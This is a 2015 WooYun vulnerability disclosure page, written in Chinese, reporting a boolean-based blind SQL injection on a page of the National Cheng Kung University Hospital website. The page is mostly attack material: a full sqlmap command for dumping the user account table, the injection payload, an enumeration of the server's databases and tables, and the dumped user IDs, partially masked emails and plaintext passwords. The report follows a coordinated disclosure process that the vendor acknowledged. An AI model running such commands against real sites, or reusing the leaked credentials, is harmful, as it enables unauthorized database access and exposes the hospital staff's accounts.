当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146734

漏洞标题:台湾国立成功大学医院某处存在SQL注射漏洞(布尔盲注/用户邮箱及明文密码泄露)(臺灣地區)

相关厂商:台湾国立成功大学

漏洞作者: 路人甲

提交时间:2015-10-14 17:13

修复时间:2015-11-30 00:24

公开时间:2015-11-30 00:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

台湾国立成功大学医院某处存在SQL注射漏洞(布尔盲注/用户邮箱及明文密码泄露)

详细说明:

使用sqlmap进行测试,测试地址:http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0

python sqlmap.py -u "http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0" -p Type --technique=B --random-agent -D nckmWeb -T www.UserAccount -C Userid,UserEmail,Userpwd,IsAdmin --dump --threads=10

漏洞证明:

---
Parameter: Type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Type=11 AND 4724=4724&ContentPage=0
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


back-end DBMS: Microsoft SQL Server 2008
database management system users [2]:
[*] lsn
[*] sa


back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] Exam100
[*] Exam81
[*] Exam91
[*] HSYS
[*] LISDB_inquiry
[*] master
[*] model
[*] msdb
[*] mv4
[*] nckmWeb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WorkTemp


Database: nckmWeb
[21 tables]
+-----------------------+
| www.Dept              |
| www.FileDownLoads     |
| www.FileDownLoads_old |
| www.FileType          |
| www.GroupAccess       |
| www.News              |
| www.NewsPgAccess      |
| www.News_bk           |
| www.News_old          |
| www.News_tmp          |
| www.PageProfile       |
| www.SiteCounter       |
| www.Speech            |
| www.SystemProfile     |
| www.Ugroup            |
| www.UserAccess        |
| www.UserAccount       |
| www.UserGroup         |
| www.WebLinks          |
| www.WebLinks_old      |
| www.WebLinks_tmp      |
+-----------------------+


Database: nckmWeb
Table: www.UserAccount
[14 columns]
+-------------+
| Column      |
+-------------+
| DeptID      |
| IsAdmin     |
| IsEabled    |
| KeyID       |
| SysDate     |
| SysUserid   |
| UserEmail   |
| Userid      |
| UsernNaC    |
| UsernNaE    |
| UsernNikeNa |
| UserNote    |
| Userpwd     |
| Userpwdhint |
+-------------+


Database: nckmWeb
Table: www.UserAccount
[21 entries]
+--------+---------------------------+---------+
| Userid | UserEmail                 | Userpwd |
+--------+---------------------------+---------+
| 0000   | em75380@**.**.**.** | 5874    |
| 11C0   | <blank>                   | 11C0    |
| 1200   | em75576                   | 1200    |
| 1400   | <blank>                   | 1400    |
| 1500   | <blank>                   | 1500    |
| 1600   | <blank>                   | 1600    |
| 1700   | <blank>                   | 1700    |
| 2000   | <blank>                   | sur5203 |
| 3100   | <blank>                   | 3100    |
| 3200   | em75441@**.**.**.** | 0925    |
| 3300   | <blank>                   | 5311    |
| 3400   | em75237@**.**.**.** | 3400    |
| 3500   | em75417@**.**.**.** | lee1016 |
| 3600   | em75190@**.**.**.** | 3600    |
| 3700   | <blank>                   | 3700    |
| 4100   | <blank>                   | 4100    |
| 4200   | <blank>                   | 4200    |
| 4300   | <blank>                   | 4300    |
| 4400   | <blank>                   | 2085    |
| 5000   | <blank>                   | 5000    |
| 6000   | <blank>                   | 821129  |
+--------+---------------------------+---------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-16 00:23

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价